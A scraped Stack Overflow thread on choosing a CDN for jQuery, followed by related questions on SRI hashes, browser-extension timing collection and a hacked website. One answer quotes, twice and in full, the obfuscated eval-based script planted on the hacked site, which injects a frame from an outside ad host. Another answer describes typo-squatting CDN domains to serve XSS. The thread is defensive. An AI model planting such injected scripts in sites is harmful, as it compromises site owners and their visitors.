Microsoft CDN for jQuery or Google CDN? [closed] - javascript

Closed. This question is opinion-based. It is not currently accepting answers.
Closed 8 years ago.
Does it actually matter which CDN you use to link to your jQuery file, or any JavaScript file for that matter? Is one potentially faster than the other? What other factors could play a role in which CDN you decide to use? I know that Microsoft, Yahoo, and Google all have CDNs now.

Update based on comments:
Short version: It doesn't matter much, but it may depend on what they host. They all host different things: Google doesn't host jQuery.Validate; Microsoft did not host jQuery UI (though since 2016 it does); Microsoft offers the scripts that would otherwise be served via ScriptResource.axd, plus easier integration (e.g. ScriptManager with ASP.NET 4.0).
Important note: If you're building an intranet application, stay away from the CDN approach. It doesn't matter who's hosting it; unless your internal server is severely overloaded, no CDN will give you more performance than local 100 Mb/1 Gb Ethernet will. If you use a CDN for a strictly internal application, you're hurting performance. Set your cache expiration headers correctly and forget that CDNs exist in the intranet-only scenario.
The chances of either being blocked seem about equal: almost zero. I have worked on contracts where this isn't true, but that seems to be the exception. Also, since the original posting of this answer, the context surrounding it has changed greatly; the Microsoft CDN has made a lot of progress.
The project I'm currently on uses both CDNs, which works best for our solution. Several factors play into this. Users with an older browser are probably still limited to 2 simultaneous requests per domain, as recommended by the HTTP specification. This isn't an issue for anyone running anything reasonably new that supports pipelining (every current browser), but splitting across two domains knocks out this limitation as well, at least as far as the JavaScript is concerned.
Google's CDN we're using for:
jquery.min.js
jquery-ui.min.js.
Microsoft's CDN we're using for:
MicrosoftAjax.js
MicrosoftAjaxWebForms.js (until 4.0, we're not completely removing all UpdatePanels)
jQuery.Validate.min.js
Our server:
Combined.js?v=2.2.0.6190 (Major.Minor.Iteration.Changeset)
Part of our build process combines and minifies all custom JavaScript, which we do via a custom script manager that includes either the release or the debug (non-minified) versions of these scripts, depending on the build. Since Google doesn't host the jQuery validation package, that can be a downside. MVC is including/using it in the 2.0 release, so you could rely completely on Microsoft's CDN for all your needs, with all of it automatic via the ScriptManager.
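As a rough sketch of that release/debug switch (the isDebugBuild flag and file names here are hypothetical; the post's custom script manager did this server-side):
var isDebugBuild = false;             // hypothetical flag emitted by the build
var version = "2.2.0.6190";           // Major.Minor.Iteration.Changeset
var src = isDebugBuild
    ? "/Scripts/Combined.debug.js?v=" + version   // readable, non-minified
    : "/Scripts/Combined.js?v=" + version;        // combined and minified
document.write('<script src="' + src + '" type="text/javascript"><\/script>');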
The only other argument to be made would be DNS lookup time; there is a cost to this in terms of page load speed. On average, simply because it's used more (it's been around longer), ajax.googleapis.com is likely to be resolved by DNS sooner than ajax.microsoft.com, because the local DNS server is more likely to have already cached a request for it (this is a first-user-in-the-area penalty). This is a very minor thing and should only be considered if performance is extremely important, down to the millisecond.
(Yes: I realize this point is contrary to my using both CDNs, but in our case the DNS time is far overshadowed by the wait time on the javascript/blocking that occurs)
Last, if you haven't looked at it, one of the best tools out there is Firebug, along with some plug-ins for it: Page Speed and YSlow. If you use a CDN but your pages request images every time because of missing cache headers, you're missing the low-hanging fruit. Firebug's Net panel can give you a quick breakdown of your page load time, and Page Speed/YSlow can offer some good suggestions to help.

You should absolutely use the Google CDN for jQuery (and this is coming from a Microsoft-centric developer).
It's simple statistics. Those who would consider using the MS CDN for jQuery will always be a minority. There are too many non-MS developers using jQuery who will use Google's and wouldn't consider using Microsoft's. Since one of the big wins with a public CDN is improved caching, splitting usage among multiple CDNs decreases the potential for that benefit.

Google will send you a jQuery version minified with their own software; this version is 6 KB lighter than the standard minified version served by MS. Go for Google.

One minor thing to consider is that both companies offer slightly different "extra" libraries:
Microsoft is offering the jQuery validation library on their CDN, whereas Google is not (http://www.asp.net/ajaxlibrary/cdn.ashx)
Google is offering the jQuery UI library on their CDN, whereas Microsoft is not (http://code.google.com/apis/ajaxlibs/documentation/)
Depending on your needs, this may be relevant.

It should also be noted that, as ajax.microsoft.com is a subdomain of microsoft.com, requests to it send along all microsoft.com cookies, adding to the overall time it takes to get the file back.
Also, ajax.microsoft.com is using default IIS7 compression which is inferior to the standard compression that other web servers use.
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.4.min.js - 33.4K
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js - 26.5K
Also, as others have mentioned, the Google CDN is far more popular, which greatly increases the chance of a file already being cached.
So I strongly recommend using Google.

It probably doesn't matter, but you could validate this with some A/B testing. Send half of your traffic to one CDN, and half to the other, and set up some profiling to measure the response. I would think it more important to be able to switch easily in case one or the other had some serious unavailability issues.
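A minimal client-side sketch of that split, assuming a hypothetical /logTiming endpoint on your own server; the Microsoft URL follows the path pattern quoted later in this thread, and a real test would more likely assign the CDN server-side:
// Pick one of the two CDNs at random for this visitor and report how long
// the jQuery file took to arrive. The /logTiming endpoint is hypothetical.
var cdns = [
    "http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js",
    "http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"
];
var chosen = cdns[Math.floor(Math.random() * cdns.length)];
var started = new Date().getTime();
var tag = document.createElement("script");
tag.src = chosen;
tag.onload = function () {
    // Fire-and-forget beacon back to our own server with the elapsed time
    new Image().src = "/logTiming?cdn=" + encodeURIComponent(chosen) +
                      "&ms=" + (new Date().getTime() - started);
};
document.getElementsByTagName("head")[0].appendChild(tag);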

I know I'm chiming in a little late here, but here is the code that I've been using in production. I've never had issues with it, but your mileage may vary. Make sure you test it in your own environment.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script type="text/javascript">
// If the CDN copy didn't load, fall back to a locally hosted copy
!window.jQuery && document.write('<script src="/scripts/jquery-1.4.2.min.js"><\/script>')
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.min.js" type="text/javascript"></script>
<script type="text/javascript">
// Same fallback idea for jQuery UI; keep the local copy in sync with the CDN version above
!window.jQuery.ui && document.write('<script src="/scripts/jquery-ui-1.8.4.min.js"><\/script>')
</script>

Is one potentially faster than the other?
I was actually curious about this myself, so I set up a jsbin test page using each of the following and then ran it through webpagetest.org's visual comparison tool. I tested:
ajax.googleapis.com
code.jquery.com
ajax.aspnetcdn.com
cdnjs.cloudflare.com
Who was fastest: code.jquery.com by 0.1 second in both tests
Who was slowest: ajax.aspnetcdn.com by 0.7 seconds in the first test and ajax.googleapis.com by 1 second in the second test
Here's the 1st test (each was tested 3 times):
Video: http://www.webpagetest.org/video/view.php?id=121019_16c5e25eff2937f63cc1714ed1eac814794e62b3
Reports: http://www.webpagetest.org/video/compare.php?tests=121019_D2_KF0,121019_9Q_KF1,121019_WW_KF2,121019_9K_KF3
Here's the 2nd test (another 3 each):
Video: http://www.webpagetest.org/video/view.php?id=121019_a7b351f706cad2c25664fee7ef349371f17c4e74
Reports: http://www.webpagetest.org/video/compare.php?tests=121019_MP_KJN,121019_S6_KJP,121019_V9_KJQ,121019_VY_KJR

As stated by Pingdom:
When someone visits your site, if they have already visited another site that uses the same jQuery file on the same CDN, the file will have been cached and doesn’t need to be downloaded at all. It can’t get any faster than that.
This means that the most widely used CDN will have the odds on its side, which can pay off for your site.
A few observations on performance:
Google’s CDN is consistently the slowest of the three both in North America and Europe. In Europe, Microsoft’s CDN is the fastest.

I think it depends on where your target audience is. You can use alertra.com to check both CDNs' speed from many locations around the world.

One additional consideration - if your site is SSL and you need to support Android 2.1 (or earlier), the SSL certificate on the HTTPS version of the Microsoft CDN will crash those versions of the Android browser, per this issue: http://code.google.com/p/android/issues/detail?id=5001. It's not Microsoft's "fault", as the SSL certificate is technically valid and the defect is in Android's SSL implementation... but it will crash your site, nonetheless.
The SSL cert on Google's CDN does not fall afoul of this particular issue (relating to the certificate's "Certificate Subject Alt Name").
So, for SSL + Android 2.1 support, use the Google CDN.

My answer is a bit different from the others: I would go with Microsoft if you need the jQuery validator, which almost everyone does if they're using jQuery.
The Microsoft CDN's HTTP connection is keep-alive, which is a big plus when you are requesting multiple items.
So if you need jQuery validation, use the Microsoft CDN; and even if you also need jQuery UI, get it from Microsoft, because Google is not using keep-alive, so every request stands on its own. Keeping everything on one CDN is the plus here: if you use Microsoft only for the validator, you are opening a separate connection to Google's servers for the other requests.
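For example, pulling all three libraries from the Microsoft CDN lets the browser reuse one keep-alive connection instead of opening a second one to Google. The version paths below are indicative only; check the CDN listing for the versions you actually need:
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.ui/1.8.6/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js" type="text/javascript"></script>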

In the summary it says that Microsoft is not offering jQuery UI; that is not correct (any more). It can be downloaded from http://www.asp.net/ajaxlibrary/cdn.ashx.

Also consider, when using the Google CDN, that sometimes people make typos such as ajax.googelapis.com. This could potentially create a really nasty XSS (cross-site scripting) attack. I have actually tested this out by registering a googlapis.com typo domain and very quickly found myself serving requests for JavaScript, maps, CSS, etc.
I emailed Google and asked them to register similar CDN typo URLs but have not heard back. This could be a real reason not to rely on CDNs, because potentially dangerous attackers awaiting the typo requests can easily serve back jQuery etc. with an XSS payload.
Thank you
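One mitigation worth noting (it comes up again in the SRI question further down): in browsers that support it, an integrity attribute makes the browser refuse to execute a CDN response whose bytes don't match the hash you published, so a typo-squatted or compromised host can't inject a payload; the script simply doesn't run. The hash below is a placeholder, not a real digest:
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"
        integrity="sha384-REPLACE-WITH-THE-REAL-HASH-OF-THE-FILE"
        crossorigin="anonymous"></script>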

Depending which industry the application targets, you may not want to use a CDN managed by other organisations. It often raises issues regarding compliance, privacy and confidentiality.
For example, when you include Google Analytics in a secure application, the browser still sends the current URL as the "referer" header. Any identifiers, say a session id or secret token, may appear in their logs. For example, if a client IP of 192.0.2.5 references https://healthsystem.example/condition/impotence, then, well, you can infer information which is considered to be rather private.
Other cases include information of consequence, such as an account number, social security number or session information in the URL. That sort of data should never be in the URL as it can be used outside of the application.
While you may trust Google, Microsoft or Yahoo, your users may not.
For industries like Finance, Legal and Health Care, you may want to establish your own CDN with the help of a vendor (e.g. Akamai) with which you can sign a BAA.

I would advise that you base your usage on the general location of the users you're targeting.
If your site is targeted for general public, then using Google's CDN would be a good choice.
If your site is also targeted at China, then using Microsoft's CDN would be a better choice.
I know this from experience, as Google's servers kept getting blocked by the Chinese government, rendering websites that use them unloadable.
*Note that you can of course create region-specific sites, e.g. cn.mysite.com, to cater specifically for China, but if you're low on resources and time, this option is worth considering.
The full list of what the Microsoft CDN hosts is here:
http://www.asp.net/ajaxlibrary/cdn.ashx
They have since renamed to ajax.aspnetcdn.com, which reduces the likelihood of blockage by firewall rules.

I would use both!
As Google's jQuery hosting has been around a lot longer, the chances are much higher that people will already have it cached compared to the Microsoft copy, so I would try it first.
Personally, I would use something like this -
if (typeof jQuery == 'undefined') {
    // jQuery is not loaded - pull it in from the Google-hosted copy
    document.write("<scr" + "ipt type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js\"></scr" + "ipt>");
} else {
    // jQuery is already loaded
}
(Not sure this works 100%, but I just wanted to sketch the idea rather than a full example. This references the Google-hosted jQuery and not the Microsoft one, as I couldn't find the link.)
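For completeness, a sketch of the same idea with the Microsoft-hosted copy as the fallback; the ajax.microsoft.com path follows the pattern quoted elsewhere on this page, so confirm the exact version before using it:
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script type="text/javascript">
if (typeof jQuery == 'undefined') {
    // Google's copy didn't load - fall back to the Microsoft CDN
    document.write("<scr" + "ipt type=\"text/javascript\" src=\"http://ajax.microsoft.com/ajax/jquery/jquery-1.3.2.min.js\"></scr" + "ipt>");
}
</script>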

Related

Possible reasons for different SRI results in different browsers?

A client would like to use SRI on all CSS and JS assets on their website, but they ran into a very strange issue with Firefox. Their server is an apache2 instance, serving HTML content. CORS is enabled for the whole virtual host, for any (*) origin. There is no cache or CDN in place.
The two files in question are
company.min.css and
company.min.js
To generate the SRI hashes, initially SRI Hash Generator was used. The output from this has multiple algorithms and looks like this:
<script src="https://example.com/static/company.min.js" integrity="sha256-aKuSpMxn15zqbFa0u0FVA7mAFOSVwIwU4gA3U7AZf5Y= sha384-WDAg+qGBjbEyE52SdQ5UHdTObTY+jYTL63m9Oy2IJcGZR8AFn0t9JNN7qdut6DBk sha512-bxmUFj1FVOVV74+zIYau/HSUcLq9cuneBKoMJyW9dAz//yKFi8eRhyyIezF++2vbGO7cR6Pzm1l9rvnPcrvIrg==" crossorigin="anonymous"></script>
similar for the CSS file. These were inserted in the HTML and the site was tested in a few different browsers, with these result:
works in Chrome (/Canary), Opera, Edge and even IE
doesn't work in Firefox (/Nightly).
Firefox only dislikes the CSS, saying that the SHA512 does not match the resource. It processes the JS file fine for whatever reason.
I confirmed (using OpenSSL) that the hash generated by the above tools is indeed correct, and the fact that it works in almost every browser except Firefox got me thinking.
So I tried to hash the resources using Mozilla's own SRI tool, srihash.org, which is a recommendation by Mozilla from their blog post on SRI.
Now it gets a bit weird.
For the CSS file, srihash.org generates a completely different hash.
For the JS file, the hash is the same for both generators and matches my offline hashing with OpenSSL.
But, if I replace the CSS link with the Mozilla-generated one, this is the result:
works in Firefox
doesn't work anywhere else, since the hash mismatches
Question
I suspect this is some problem within Firefox's SRI implementation. The relevant discussion for the implementation is here, but it doesn't give any reason why the resource is different in Firefox. But I'm not strictly a web developer, so are there any likely (documented) reasons for different SRI hashes in different browsers?
I can't disclose the exact server/resources. This is a general question, so if you have any objective experience or references to authorized sources documenting differences in the SRI implementation, please answer.
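For reference, a minimal Node.js sketch of the kind of offline hash check the question describes (the question used OpenSSL; the file name below is assumed to be a locally saved copy of the resource). If the server returns different bytes to different clients, the hashes will legitimately differ:
// Recompute the sha512 SRI value for a locally saved copy of the resource
var crypto = require("crypto");
var fs = require("fs");

var body = fs.readFileSync("company.min.css");   // the exact bytes to verify
var digest = crypto.createHash("sha512").update(body).digest("base64");
console.log("sha512-" + digest);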

Implementing Boomerang into a browser extension/plugin

I am currently developing a browser extension/plugin that one would install and would then report information such as page load times, number of objects on each page, etc. to a server so that the data could be analyzed.
I was curious if something like Yahoo's Boomerang JavaScript code (http://hacks.bluesmoon.info/boomerang/doc/) would be able to do this. From what I have read, it seems like Boomerang was developed for developers to implement into their own website in order to gather data, but would I be able to gather the same kind of data by putting this code in a browser extension, in order to gather the data from each website that is visited?
The link you're using for boomerang is very outdated (it was my first experimental page). Use http://lognormal.github.com/boomerang/doc/
Boomerang does already use these APIs, and much more, but as a browser extension, you could do much more in terms of removing code that supports other browsers, and also maintaining offline storage more efficiently than boomerang's cookies.
FWIW, yslow already does most of what you want, so maybe just use that (it was built by the same team)
I don't see why not from a technical perspective, at least in Firefox and Chrome. However, user privacy issues and policies of the browser extension stores might prevent you from tracking users in certain ways and/or without consent. So better check that first to avoid surprises later.
You'd need a way to gather information. Judging from your question text, the regular DOM APIs and the PerformanceTiming API might be sufficient. And that's probably what Boomerang uses already.
You'd just attach your code (or Boomerang) with e.g. Firefox Add-on SDK PageMod or Chrome extension Content Scripts.
You'll also need to transmit the data somewhere. Both Firefox (XUL1, Add-on SDK) and Chrome extensions allow cross-origin XHR.
So there you are. ;)
1 XUL overlay scripts are privileged, and not restricted by the same-origin policy.
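As a rough sketch of the Chrome side of this, a content script (declared in the extension's manifest with a match pattern and a host permission for the collector) can read the PerformanceTiming data and beacon it out. The collector URL is hypothetical, and newer Chrome versions may require relaying the request through the extension's background page:
// collect.js - content script injected into every page the extension matches
function report() {
    var t = window.performance.timing;
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://collector.example.com/beacon");   // hypothetical endpoint
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.send(JSON.stringify({
        url: location.href,
        loadTimeMs: t.loadEventEnd - t.navigationStart,
        objectCount: document.getElementsByTagName("*").length
    }));
}

if (document.readyState === "complete") {
    report();
} else {
    // Wait for onload so loadEventEnd is populated before we read it
    window.addEventListener("load", function () { setTimeout(report, 0); });
}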

My site is loading some other site, causing it to redirect to it

My site, http://moremariners.com, is making a request to http://bookiemonster.com/ads.php (which isn't even a real page), causing it to redirect to that page on mobile browsers. You can see that the request is made on a PC, too, and if you inspect with Google Chrome, you can see the GET request for it. However, none of my files include a GET request to that host.
How do I rid myself of this garbage?
Note the very end of your index.html file:
</html><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k...
Your site has been hacked.
Whether or not someone here will go to the effort of decoding what this JavaScript does, what HTML it loads, etc. (which I would find interesting reading), the point is that your site has either insecure configurations or code with vulnerabilities.
The safest way forward is to wipe the machine. (Really. Rootkits are pretty incredible things these days. Someone else may have better control of your machine than you do.) Then re-install your CMS using the latest released and supported version. Then re-install your data, dumped from a known good data source. (You do have off-line backups of your data, right?) Make sure your data is clean and problem-free before loading it in your new instance. Make sure you configure your access controls as tight as possible, so that future attacks are more difficult. Consider also deploying a mandatory access control tool such as AppArmor, SELinux, TOMOYO, or SMACK. (I've been an AppArmor team member for over a decade now; it's my recommendation for most users but one of the other tools may be a better fit for you or your organization.)
Sounds like a malicious program infected your system.
I've used Hitman Pro, a cloud-based antivirus and malware program that will clear most infections like this - free for 30 days too...
Search Google and download it. V3.5, I think.
Jonah
Your page ends up with two frames in it, that both refer to bookiemonster for ads.
You have this suspicious looking code at the end of your page that appears to be some sort of javascript that is trying to obscure what it's doing. If this isn't something you put there on purpose, then your site or page may have been hacked. I'd suggest removing this from the end of your page and then it's probably time for a thorough site security review. You probably will need to monitor that it doesn't get put back too.
<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new 
Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script>
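For anyone curious, the obfuscation above is shallow: h works out to -2 (a two-millisecond date difference, negated), so each number in the long "k"-separated string is just half a character code. A safe way to see what the payload does is to decode it without calling eval:
// Decode the payload for inspection instead of executing it
var encoded = "4.5k4.5k52.5k51k16k20k50k55.5k...";   // paste the full "n" string here
var decoded = encoded.split("k").map(function (v) {
    return String.fromCharCode(2 * Number(v));       // -h * n[i] with h = -2
}).join("");
console.log(decoded);   // reveals the script's real payload (the bookiemonster frame injection described above)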

Is using a CDN for jQuery (or other static files/scripts) really a good idea?

It says everywhere to use a CDN, such as Google's or Microsoft's AJAX CDN to load static script libraries, such as jQuery in my case.
I don't understand how this really helps make my site any faster. In Firebug, I'm getting around 300 ms for both the Google and Microsoft AJAX servers when I load jQuery, and in Chrome I'm getting around 100 ms (I don't know what creates the difference; no downloads were going on, and I tried both several times, but anyway, that's not the point). My site will have an estimated average response time of 30 to 40 ms when I deploy. How can loading the files from the CDN do my site any good? It will make everything even worse!
I understand that when I visit many sites using, say, jQuery from Google's CDN, the browser only has to "download" the script once for a very long time, but my browser still tries to connect to Google's server, asks for the script file, and then receives a 304 Not Modified status code. During this round trip of 200 ms (average of Chrome and FF), I wait. But if I hosted the script file myself, it would load MUCH faster, about five times faster, which is an important factor for user experience. Maybe 200 ms is not a VERY BIG deal, but it's still a difference, and I want to know why it's recommended to use a CDN instead of hosting the files ourselves. In the end, after a one-time load, the browser will cache the script for my site as well, and if I use a CDN, the browser will ask the CDN for the script anyway, which will slow down my website.
Update: I am from Turkey, and that may be the primary reason for the high round trips. Most of my visitors will be from here, so I'm asking whether it would be beneficial for my site, hosted on servers in Turkey with users who are also in Turkey, to use a CDN. Definitely not good for round trips, but maybe I'm missing something.
Two part answer:
You shouldn't be seeing 304s
But is it a good idea?
You Shouldn't Be Seeing 304s
I understand that when I visit many sites using, say, jQuery from Google's CDN, it will have to "download" the script only once for a very long time, but my browser still tries to connect to the Google's server, and ask for the script file, and then receive 304 not modified status code.
It shouldn't, not if it's respecting the Cache-Control header:
Cache-Control:public, max-age=31536000
...which says from the date on the resource, the browser can cache it for up to a year. No need for any HTTP request at all (and that's what I see in Chrome unless I force it, no request at all, just a note saying "from cache"; fired up Firefox and made sure Firebug was on for all pages, came to StackOverflow for the first time in a long time with Firefox [which I only use for testing], and sure enough, it didn't issue any request for jquery at all).
E.g., maybe it takes 200ms for a 304 response, but if your browser is caching correctly, it'll be 0ms for a load-from-cache.
The full set of relevant headers I see on a forced request are:
Cache-Control:public, max-age=31536000
Date:Wed, 17 Aug 2011 21:56:52 GMT
Expires:Thu, 16 Aug 2012 21:56:52 GMT
Last-Modified:Fri, 01 Apr 2011 21:23:55 GMT
...so my browser shouldn't have to request that path again for nearly a year.
See Dave Ward's comment below: To get maximum caching results, use the full release number, e.g.:
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<!-- very specific ---^^^^^ -->
rather than
<script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<!-- very generic ----^ -->
Okay, but is it a good idea?
That's entirely up to you. Even with a fallback like this:
<script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<script>
if (typeof jQuery === "undefined") {
document.write("<scr" + "ipt src='/my/local/jquery.js'></scr" + "ipt>");
}
</script>
...or similar, the UX if the CDN is down is going to be awful. The browser is going to spin for ages trying to connect to it. That kind of fallback will only help if the CDN quickly replies with a failure, which is unlikely.
